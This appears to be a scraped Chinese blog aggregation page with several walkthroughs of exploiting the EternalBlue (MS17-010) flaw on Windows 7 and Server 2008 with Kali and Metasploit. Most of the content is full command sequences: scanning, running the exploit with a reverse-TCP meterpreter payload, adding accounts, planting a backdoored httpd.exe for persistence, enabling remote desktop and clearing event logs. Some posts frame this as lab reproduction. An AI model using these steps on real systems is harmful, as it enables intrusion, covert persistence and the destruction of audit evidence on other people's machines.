精华内容
下载资源
问答
  • kali永恒之蓝渗透win10
    千次阅读
    2022-01-24 10:04:31

    kali Eternalblue to win7

     实验准备
    攻击机: kali , IP: 192.168.226.130
    靶机:win7 , IP: 192.168.226.128
     实验过程
     关闭win7防火墙,开放445,139端口
     扫描以下,查看端口情况
    $ sudo nmap -sV -A -O 192.168.226.128
     启动msfconsole
    $ msfconsole

    在这里插入图片描述

     使用auxiliary/scanner/smb/smb_ms17_010监测ms17_010是否可用
    $ use auxiliary/scanner/smb/smb_ms17_010

    在这里插入图片描述

    主机很有可能具有ms17-010的漏洞,可攻击

     开始攻击
    $ use exploit/windows/smb/ms17_010_eternalblue
    $ set RHOST 192.168.226.129 //靶机
    $ set LHOST 192.168.226.130 // 攻击机
    $ set payload windows/x64/meterpreter/reverse_tcp
    $run

     成功
    在这里插入图片描述
    欢迎交流指正!

    更多相关内容
  • 利用永恒之蓝渗透WIN7

    2021-10-18 09:30:14
    实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:...

    实验名称:利用永恒之蓝渗透win7

    实验人:xx

    实验日期:2021.9.24

    实验目的:通过已知漏洞攻击目标服务器并拿到shell

    实验环境:

    kali:172.16.12.30

    win7靶机:172.16.12.4 用户名:administrator 密码:vgrant

    实验步骤:

    配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled

    查看MS17-010相关模块,并使用序号3扫描模块扫描目标及

    msf6 > search ms17-010

    msf6 > use 3

    查看模块参数并设置目标机IP,执行扫描,未发现相关漏洞

    msf6 auxiliary(admin/smb/ms17_010_command) > show options

    msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.12.4

    rhosts => 172.16.12.4

    msf6 auxiliary(admin/smb/ms17_010_command) > run

    换序号4模块进行扫描,设置目标主机,执行扫描,发现漏洞

    msf6 > search ms17-010

    msf6 > use 4

    msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

    msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.12.4

    rhosts => 172.16.12.4

    msf6 auxiliary(scanner/smb/smb_ms17_010) > run

    查找攻击模块,并使用

    msf6 > search ms17-010

    msf6 > use 0

    查看设置模块,并设置目标主机ip,执行run

    msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.12.4

    rhosts => 172.16.12.4

    msf6 exploit(windows/smb/ms17_010_eternalblue) > run

    渗透成功

    meterpreter > getuid

    Server username: NT AUTHORITY\SYSTEM

    meterpreter > pwd C:\Windows\system32

    对目标及实施攻击

    截取屏幕

    创建账户

    meterpreter > shell #进入目标机shell

    C:\Windows\system32>net user #查看当前账户

    创建账户cuiyi

    C:\Windows\system32>net user cuiyi /add

    创建后门

    meterpreter > ps -S httpd.exe

    meterpreter > kill 3212 #先杀死进程才能下载,下载后调到后台

    meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe

    制作后门文件

    msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp

    msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options

    msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.16.12.30

    lhost => 172.16.12.30

    msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p windows -x /root/desktop/httpd.exe -k -f exe -o /root/httpd_door.exe

    [*] Writing 29184 bytes to /root/httpd_door.exe...

    启动监听,监听后门的反向连接,并用run -j到到后台

    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler

    [*] Using configured payload generic/shell_reverse_tcp

    msf6 exploit(multi/handler) > show options

    msf6 exploit(multi/handler) > set lhost 172.16.12.30

    lhost => 172.16.12.30

    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

    payload => windows/x64/meterpreter/reverse_tcp

    msf6 exploit(multi/handler) > exploit -j

    [*] Exploit running as background job 0.

    [*] Exploit completed, but no session was created.

    [*] Started reverse TCP handler on 172.16.12.30:4444

    切回之前保存后台的会话,上传后门文件并重命名

    msf6 exploit(multi/handler) > sessions

    Active sessions

    ===============

    Id Name Type Information Connection

    -- ---- ---- ----------- ----------

    1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 172.16.12.30:4444 -> 172.16.12.4:49609 (172.16.12.4)

    msf6 exploit(multi/handler) > sessions 1

    [*] Starting interaction with 1...

    meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\

    meterpreter > pwd

    c:\wamp\bin\apache\apache2.2.21\bin

    meterpreter > mv httpd.exe httpd.exe.bak

    meterpreter > upload /root/httpd_door.exe

    [*] uploading : /root/httpd_door.exe -> httpd_door.exe

    [*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd_door.exe -> httpd_door.exe

    [*] uploaded : /root/httpd_door.exe -> httpd_door.exe

    meterpreter > mv httpd_door.exe httpd.exe

    重启wampapache服务,服务器启动后,返回了新的会话(最后一行)

    exploit/multi/handler 保持监听状态,每当对端的“httpd.exe” 重启,这边就会启动会话

    重启wampapache

    返回kaili看到成功建立连接

    展开全文
  • 本章通过使用msf在内网环境下利用永恒之蓝漏洞模拟攻击win2003完整的渗透流程。

    1.信息收集

    (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞。

     (2)运行metasploit。

    2.漏洞探测

    (1)查看漏洞模块。

     (2)使用Auxiliary 模块测试目标。

    3.漏洞利用

    (1)使用exploit模块进行永恒之蓝攻击。

    4.权限提升

    (1)获取控制台shell。

     (2)获得权限,添加用户并设置为管理员权限。

    5.权限维持


    (1)目标主机C:\windows\temp目录下,产生一个.Vbs的脚本,实现开机自动运行。在kali上监听4444端口,等待反弹对话。

    6.远程桌面

    (1)利用meterpreter会话打开目标服务器远程桌面服务的3389端口。

     (2)新建一个终端,调用rdesktop连接目标机器的远程桌面。

     (3)输入刚刚创建的用户名和密码。

     (4)成功进入目标桌面。

    7.痕迹清除

    (1)使用clearev来清除日志文件。

    展开全文
  • 首先开篇先放出我使用的kaliwin7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对...

    首先开篇先放出我使用的kali 与 win7 的网盘链接:

    链接: https://pan.baidu.com/s/1tvrj41wLRY4ZTfJG8mDwVA?pwd=v6e4

    提取码: v6e4

    大家VMware上新建虚拟机即可~

    简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~

    1. Metasploit初始化

    在使用之前我们需要对Metasploit进行初始化,并启动:

    终端窗口的命令行输入如下命令

    systemctl start postgresql
    systemctl enable postgresql
    

    启动专用的数据库,并设置为每次开机自动启动

    msfconsole
    

    或者 点击kali屏幕左上角图标->选择 08->点击Metasploit framework

    (P.S. msf == Metasploit framework

    2. Metasploit常用命令

    search 
    
    • 按关键字查找
    use
    
    • 选择对应模块并使用
      (P.S. <1>在use 中想退出模块不退出框架使用 back命令;<2> 也可以使用info 查看使用模块的详细信息
    show options
    
    • 查看该模块需要配置的参数
    run
    
    • 运行模块

    事实上,msf的使用法则三步走

    1. 查找对应可使用模块;
    2. 使用模块并配置模块必选项;
    3. 运行模块。

    msf中共有6大模块,分别是:

    1. 渗透攻击模块Exploit Modules:攻击漏洞
    2. 辅助模块Auxiliary Modules:扫描
    3. 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
    4. 空字段模块Nop Modules
    5. 编码模块Encoders
    6. 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

    在本次实验中,我们主要使用123.

    3.永恒之蓝复现过程

    3.1准备工作
    首先确定两台虚拟机kali与win7在同一网段内,同时win7防火墙已关闭
    P.S.kali 使用 ifconfig 查看 ip,win7 使用 ipconfig 查看ip

    • 其中我的win7 ip 为 192.168.31.73

    P.S.win7防火墙关闭:

    1. 选择左下角“开始”图标,
    2. 点击“控制面板”,
    3. 选择“系统与安全”,
    4. 点击“windows防火墙”,
    5. 左列选择“打开或关闭防火墙”

    3.2扫描是否有可用漏洞

    P.S.永恒之蓝(MS17_010)

    search ms17_010
    

    先搜索查找可用模块
    在这里插入图片描述

    use auxiliary/scanner/smb/smb_ms17_010
    

    use 调用Aux扫描模块(借此查看目标主机是否有漏洞
    在这里插入图片描述

    show options
    

    使用该命令查看需要配置的参数,Required == yes 且 Current Setting 为空的值是我们需要配置。
    在这里插入图片描述

    set rhost 192.168.31.73
    

    设置上文所需的rhost参数
    在这里插入图片描述

    run
    

    出现+号表示可以入侵
    在这里插入图片描述

    3.3渗透

    use exploit/windows/smb/ms17_010_eternalbule
    show options
    set 192.168.31.73
    

    P.S.和扫描有异曲同工之处

    use 调用Exploits模块(该模块也是search中搜索出的),并查看需配置的参数,并设置参数
    在这里插入图片描述

    在这里插入图片描述

    show payloads 
    set payload windows/x64/shell/reverse_tcp
    run
    

    查看可使用的攻击载荷并设置,最后运行该模块
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里可以看见我们拿到win7的shell的,但是会出现乱码,解决乱码的情况

    chcp 65001
    

    在这里插入图片描述
    3.4测试

    在kali上干一些对win7有影响的事吧!比如在这里我是添加了一个faker用户
    在这里插入图片描述
    回到win7发现确定增加了该用户~

    3.5保存该次进程于后台,并再次打开

    background
    

    进程放至后台

    sessions -l
    

    展示后台进程

    sessions -i 2
    

    再次打开该进程
    在这里插入图片描述

    展开全文
  • 永恒之蓝 MS17-010漏洞复现 学好网络安全,保护自己,保护家人
  • kali永恒之蓝

    千次阅读 2021-10-24 12:45:06
    kali永恒之蓝攻击写在前面一、永恒之蓝是何方神圣?二、神马是SMB协议?三、MSF四、攻击步骤1、攻击主机与靶机配置2、攻击步骤五、种植后门 写在前面   这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,...
  • kali+msf永恒之蓝渗透win7并建立新用户获取权限 1. 准备一台关闭防火墙的win7,目标ip地址为192.168.128.147,本机ip为192.168.128.146 2. 保证msf执行run的时候win7是开启的 msfconsle #启动msf search name:ms17-...
  • Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透 术语 渗透攻击(exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全 漏洞,所进行的攻击行为。 攻击载荷(payload),是我们期望目标系统在...
  • 环境搭建:kali、Windows server 2008R2、Windows 7,其中Windows server 2008R2\WIN7为靶机。 首先简单介绍一下什么是永恒之蓝永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议...
  • kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National ...
  • 最详细永恒之蓝渗透和后渗透教程
  • kali入门到入狱之 永恒之蓝(MS17-010)复现.

    千次阅读 多人点赞 2022-03-15 01:00:45
    利用永恒之蓝(MS17-010)拿到电脑win7(32位)权限(包含:开关键盘/鼠标,文件上传,开启的远程桌面,使用摄像头拍照,重新启动计算机,关闭防护软件,取消户登录,电脑蓝屏等等......)
  • kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应该有不少错误,...
  • 8步完成get shell,需要的机子:渗透机(Linux(kali)一台),靶机(server 2008一台),简单的配置,就可以开始攻击了
  • 永恒之蓝漏洞复现及上传后门程序

    千次阅读 2021-11-17 12:40:41
    攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 可以ka里面用nmap扫描靶机开了那些端口 输入msfdb run 进入msf中 开始搜索ms17_010 命令 search ms17_010 先使用aux模块扫描...
  • 1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 473
精华内容 189
关键字:

kali永恒之蓝渗透win10